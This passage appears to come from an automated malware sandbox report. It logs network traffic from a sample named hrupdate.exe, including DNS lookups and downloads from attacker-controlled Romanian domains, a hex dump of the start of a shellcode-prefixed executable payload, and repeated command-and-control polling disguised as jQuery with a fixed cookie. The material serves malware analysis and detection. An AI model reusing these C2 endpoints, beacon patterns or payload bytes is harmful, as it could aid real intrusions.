                                     Dec 19, 2024 22:48:14.915308952 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:14.915431023 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:14.916173935 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:14.916184902 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:14.918083906 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:14.918091059 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:15.610899925 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:15.610964060 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:15.611021996 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:15.611048937 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:15.611062050 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:15.611102104 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:15.611124992 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:15.611185074 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:15.611399889 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:15.611414909 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:27.284576893 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:27.284636021 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:27.284723043 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:27.285027981 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:27.285043955 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:28.669029951 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:28.669097900 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:28.669615984 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:28.669632912 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:28.671854019 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:28.671874046 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:29.363706112 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:29.363739967 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:29.363810062 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:29.363822937 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:29.363826036 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:29.363873959 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:29.364164114 CET | 49981 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:29.364182949 CET | 443 | 49981 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:44.299640894 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:44.299673080 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:44.299771070 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:44.300062895 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:44.300074100 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:45.784198999 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:45.784590960 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:45.785428047 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:45.785444021 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:45.787087917 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:45.787106037 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:46.485691071 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:46.485812902 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:46.485852003 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:46.485872030 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:46.485883951 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:46.485927105 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:46.485959053 CET | 443 | 49982 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:46.486006021 CET | 49982 | 443 | 192.168.2.5 | 3.79.209.76
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Dec 19, 2024 22:45:41.506064892 CET | 61432 | 53 | 192.168.2.5 | 1.1.1.1
                                     Dec 19, 2024 22:45:41.901235104 CET | 53 | 61432 | 1.1.1.1 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.803864956 CET | 52583 | 53 | 192.168.2.5 | 1.1.1.1
                                     Dec 19, 2024 22:47:45.944801092 CET | 53 | 52583 | 1.1.1.1 | 192.168.2.5
                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                     Dec 19, 2024 22:45:41.506064892 CET | 192.168.2.5 | 1.1.1.1 | 0x5338 | Standard query (0) | www.hrtraining.ro | A (IP address) | IN (0x0001) | false
                                     Dec 19, 2024 22:47:45.803864956 CET | 192.168.2.5 | 1.1.1.1 | 0xaecc | Standard query (0) | www.hrtraining.ro | A (IP address) | IN (0x0001) | false
                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                     Dec 19, 2024 22:45:41.901235104 CET | 1.1.1.1 | 192.168.2.5 | 0x5338 | No error (0) | www.hrtraining.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
                                     Dec 19, 2024 22:45:41.901235104 CET | 1.1.1.1 | 192.168.2.5 | 0x5338 | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | (none) | 3.79.209.76 | A (IP address) | IN (0x0001) | false
                                     Dec 19, 2024 22:47:45.944801092 CET | 1.1.1.1 | 192.168.2.5 | 0xaecc | No error (0) | www.hrtraining.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
                                     Dec 19, 2024 22:47:45.944801092 CET | 1.1.1.1 | 192.168.2.5 | 0xaecc | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | (none) | 3.79.209.76 | A (IP address) | IN (0x0001) | false
                                    • www.flntp.ro
                                    • www.hrtraining.ro
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.5 | 49704 | 3.79.209.76 | 80 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     Dec 19, 2024 22:45:42.024553061 CET | 58 | OUT | GET /trakingu/user HTTP/1.0
                                    Host: www.hrtraining.ro
                                     Dec 19, 2024 22:45:43.281513929 CET | 321 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:45:43 GMT
                                    Content-Type: text/html
                                    Content-Length: 162
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     1 | 192.168.2.5 | 49938 | 3.79.209.76 | 80 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     Dec 19, 2024 22:47:43.627811909 CET | 62 | OUT | GET /trainingcheck_v5498 HTTP/1.0
                                    Host: www.hrtraining.ro
                                     Dec 19, 2024 22:47:44.887485981 CET | 1236 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:47:44 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 278025
                                    Last-Modified: Mon, 04 Nov 2024 13:31:08 GMT
                                    Connection: close
                                    ETag: "6728cc9c-43e09"
                                    Accept-Ranges: bytes
                                    Data Raw: 90 90 90 90 90 90 90 90 90 4d 5a 52 45 e8 00 00 00 00 5b 89 df 55 89 e5 81 c3 e3 ba 00 00 ff d3 68 f0 b5 a2 56 68 04 00 00 00 57 ff d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 af ba e0 52 13 9e cc 0e 84 15 0a 33 f1 4c 79 ae a8 e7 72 2c 30 7b a4 b7 23 50 7f 8f 4d 94 b9 2f 67 54 df 12 db b4 48 7a ec 0f 66 bd 63 0e 7d f4 17 64 c4 e6 57 80 fe 45 10 20 f6 ed 9f c8 be f6 75 c4 f1 dc 8b 05 34 bc 0b ad 20 fc 3b 8c 77 d1 d7 1a 65 87 ae a1 37 ff 4d 63 75 ac 19 42 e3 45 70 fd f5 ca 3e 21 14 91 1c 54 e8 71 d2 3f 98 89 d2 bc f1 74 36 25 a2 3b b8 c4 16 42 0e d2 1d a7 b3 c1 eb f8 7f 27 2e 7f bf 4b e7 8c 15 98 b0 97 f3 82 0f 98 a6 d2 15 37 d3 e0 43 a2 a6 84 b8 60 dd 57 8d 8c ce a0 b6 aa 79 c2 72 6b 07 98 5d 83 4e 4f 00 00 4c 01 04 00 40 44 25 58 00 00 00 00 0b e2 0e 71 e0 00 03 31 0b 01 09 00 00 c4 02 00 00 f8 01 00 00 00 00 00 c0 ed 09 00 00 10 00 00 00 e0 02 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 47 00 00 04 00 00 00 [TRUNCATED]
                                    Data Ascii: MZRE[UhVhWR3Lyr,0{#PM/gTHzfc}dWE u4 ;we7McuBEp>!Tq?t6%;B'.K7C`Wyrk]NOL@D%Xq1 G@{Qjd0(%kU `%j!@@%oj4f@%kd"$@B2DV}6]QO")22gb=Vs>)1Uf)TbPg~`f<*AY!Rt%By~3R=NOY;#yXG9#iz:gZ}K5v;B\(]D'd#2Lpc.=/Z_%"DR2I9KI}bh{.brn#/\l?J\)<-tevr|d+$#/`/
                                     Dec 19, 2024 22:47:44.887603998 CET | 1236 | IN | Data Raw: 5c 99 5d 82 0a a3 45 b1 3e 3c 15 7c c8 7f e2 f0 09 a1 3c 6c d6 66 d5 66 fe 81 82 e5 87 89 51 e2 f7 53 2c e8 c6 00 03 18 6d c6 69 2c 14 ac 12 2f ce 0a 58 17 47 87 18 00 00 00 00 5d b5 b7 21 0a e2 0e fa fb 5d e6 01 0f f2 fd d4 54 25 0b 91 7b e6 1e
                                    Data Ascii: \]E><|<lffQS,mi,/XG]!]T%{p/'87H&2qX$(Kqi~{Vk{qJqqDa&ay{u0z'Zk_y80L(k_e{z*q&
                                     Dec 19, 2024 22:47:44.887646914 CET | 1236 | IN | Data Raw: c7 0e 71 52 bb e5 62 61 e2 f1 04 1b 1d 7b 7d f4 97 06 99 76 1d f1 8e 88 26 1e 28 56 21 e6 d0 24 e2 0e 54 f5 1d f1 0e c8 b7 85 9d 88 0e 4a 22 5d b5 66 99 2f e2 0e 99 60 68 0e 71 80 12 c9 75 2f e2 0f 71 0b b4 e6 53 87 e2 0e ce 8b e2 0e 71 5c b4 87
                                    Data Ascii: qRba{}v&(V!$TJ"]f/`hqu/qSq\4dQ]kKqak(:4(.qaWN4dY]kK"q.nXVaRqC(uUhcq2;{uK(qd7
                                     Dec 19, 2024 22:47:44.888118982 CET | 1236 | IN | Data Raw: e2 0e f2 36 1a 3c 75 1b e2 01 f6 fa 1f f1 8e e3 1e 2f 71 0b 0a af 84 0b e2 51 2f 50 2b cd 24 80 0e 8d 9d 1b b4 59 8e 7e ea e6 49 8d e2 0e fa fb aa 57 05 0d aa 7b 7c 5b 09 0c 1b 0a 0a 06 a8 0b e2 8d b5 0f 0a 1d a8 0b e2 85 89 86 a7 fe 1b 1a b2 e6
                                    Data Ascii: 6<u/qQ/P+$Y~IW{|[~4QNX!qoKa^q&[~#%N!_q[e4TQ/![c"]fBoU"[mNNF]!sa}aoUeqR
                                     Dec 19, 2024 22:47:44.888154030 CET | 896 | IN | Data Raw: ee 0e 71 5b 6f 4b 81 e3 e9 02 71 0b b2 e6 53 fd 1d f1 fc 4e 12 5e 99 d7 e9 0e 71 88 26 1e 2e 55 2b cd d0 e7 56 0a 61 62 2b f6 71 0b e2 67 a3 f3 e2 0e 71 5d b5 64 4f 86 9e 0f 61 52 6f 7a 73 1b 11 ab 2e 55 21 85 7c e7 56 0a 61 62 22 f6 71 0b e2 66
                                    Data Ascii: q[oKqSN^q&.U+Vab+qgq]dOaRozs.U!|Vab"qfOu=87qu0k^!k^y[Htq0SnrU![c"]f!sa}ao`qR~dta%(qbq~dra
                                     Dec 19, 2024 22:47:44.888190031 CET | 1236 | IN | Data Raw: 58 1e 6e 0b e2 72 fd e0 37 83 34 ef 8a 0e 70 0b e2 5e 99 cc e4 0e 71 f4 97 02 fc 4e 06 5e 99 00 e5 0e 71 f4 97 1e fc 4e 06 5e 99 f4 e4 0e 71 86 a7 ea 1b 1b b2 e6 85 0d e2 0e 8e 7e 16 83 34 ef b2 e6 99 0d e2 0e 8e 7e 1a 83 34 ef b2 e6 ad 0d e2 0e
                                    Data Ascii: Xnr74p^qN^qN^q~4~4dZ0q[oKq74(TU~p<<]'\Yq]Bo'[e]d1'[eq~qqWiqRsd
                                     Dec 19, 2024 22:47:44.888925076 CET | 1236 | IN | Data Raw: b4 59 99 3b 1c f1 8e e0 23 64 70 61 83 e6 bd 18 e2 0e 28 52 bb cd fa f4 b5 28 71 1b 86 28 71 1b 8f 28 71 1b 94 28 71 1b 62 28 71 1b 68 28 71 1b 76 28 71 1b 76 28 71 1b b7 85 9d 88 0e 1e 27 5c 1d 7b 7d 86 a7 fe 8e 7e ea 5e 99 dd 9a 0e 71 86 a7 fe
                                    Data Ascii: Y;#dpa(R(q(q(q(qb(qh(qv(qv(q'\{}~^q^qCzjCnxqdsUosNdp[W(T^iN9h10{]pX~ssS^i'8X"qRgTX']q&!]X2KFqa}[X~=H9
                                     Dec 19, 2024 22:47:44.888961077 CET | 1236 | IN | Data Raw: b7 85 9d 5a b1 58 26 e3 42 98 71 0b 6b 4b 8d 8e 22 70 23 80 bf 1e fc 70 ea 59 99 78 6c 0f 71 80 12 57 f4 fd 96 5e 8e 7e 1e e6 ae 73 e0 0e 8e 7e ea 87 77 e3 37 76 73 0b b1 f1 04 07 6b 48 75 86 a4 06 21 e3 6d f7 70 0b 88 37 26 5d 0a b5 99 f4 1d 59
                                    Data Ascii: ZX&BqkK"p#pYxlqW^~s~w7vskHu!mp7&]Y'paY{a&.U^iqoq}\qq(vi!'q&N(WT^i~${i~{~XXS^i~4{m
                                     Dec 19, 2024 22:47:44.888993979 CET | 1236 | IN | Data Raw: d9 fd 7e 8f 23 0e 71 0b db 53 7d 7e 8e 37 2c f3 96 69 17 88 1a 0c 05 5f 88 22 28 e3 82 bf 71 0b 88 25 28 6d 6b 4b 7b e3 b6 bf 71 0b 84 85 3c 01 84 35 b0 7f d5 83 34 f7 b2 64 5a 52 0a 31 c0 0b e2 01 c6 cb b2 f1 44 3b 94 0a 61 5d b1 e6 57 c2 e2 0e
                                    Data Ascii: ~#qS}~7,i_"(q%(mkK{q<54dZR1D;a]W~dp\>xu;A}"]zh{x]PW0(?a0!zl]^Vs;E}RskE}]'qa}"l;aTU"\#(Eq{}~4!
                                     Dec 19, 2024 22:47:44.889637947 CET | 1236 | IN | Data Raw: 22 70 6b 5b 69 48 3d f4 94 3a 72 cc b2 e6 6c fb e3 0e fa 4d ae 8d b5 07 e1 c9 f8 4d d6 3d b1 4b bd 55 b8 c8 b7 85 9d 88 0e 2e f2 6e 1a 0e 22 80 bf 06 27 5c 1d 7d 49 86 a7 ea 8e 78 d6 5e 99 6d 88 0e 71 88 26 02 fc 4e 06 64 61 5b 0a ad 1a 0b e2 57
                                    Data Ascii: "pk[iH=:rlMM=KU.n"'\}Ix^mq&Nda[W(4csiEuBcpiEeqg-p:/i~qm~qamiu}#g~wqmiue<t0{t]uhJpq5~G
                                     Dec 19, 2024 22:47:45.007430077 CET | 1236 | IN | Data Raw: 1a 8d 9d 1b 6f 0a 55 63 e2 06 71 0b b2 e6 d9 e5 1d f1 8e 7e ea 83 35 2f ee 5e 99 e0 0c f1 8e f4 97 02 fc 4f c6 1a 21 e3 3c e0 8e f4 1d 7b 61 86 a6 2a 6d 5b 0a df 9f f4 1d 8d b5 2b 61 73 65 0b 96 2e fa 4e f6 83 21 0a 68 06 31 8f 2b 7b 88 20 20 5e
                                    Data Ascii: oUcq~5/^O!<{a*m[+ase.N!h1+{ ^~5/^&oJU^O[oU[W$dqa{yaaV![{}adqO&,{a'&,a{}&,8"^!


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.5 | 49946 | 3.79.209.76 | 443 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-19 21:47:47 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                     2024-12-19 21:47:48 UTC | 235 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:47:47 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5671
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                     2024-12-19 21:47:48 UTC | 5671 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     1 | 192.168.2.5 | 49979 | 3.79.209.76 | 443 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-19 21:48:03 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                     2024-12-19 21:48:03 UTC | 235 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:03 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5692
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                     2024-12-19 21:48:03 UTC | 5692 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     2 | 192.168.2.5 | 49980 | 3.79.209.76 | 443 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-19 21:48:14 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                     2024-12-19 21:48:15 UTC | 235 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:15 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5692
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                     2024-12-19 21:48:15 UTC | 5692 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     3 | 192.168.2.5 | 49981 | 3.79.209.76 | 443 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-12-19 21:48:28 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:48:29 UTC | 235 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:29 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5649
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:48:29 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    4 | 192.168.2.5 | 49982 | 3.79.209.76 | 443 | 6664 | C:\Users\user\Desktop\hrupdate.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-12-19 21:48:45 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
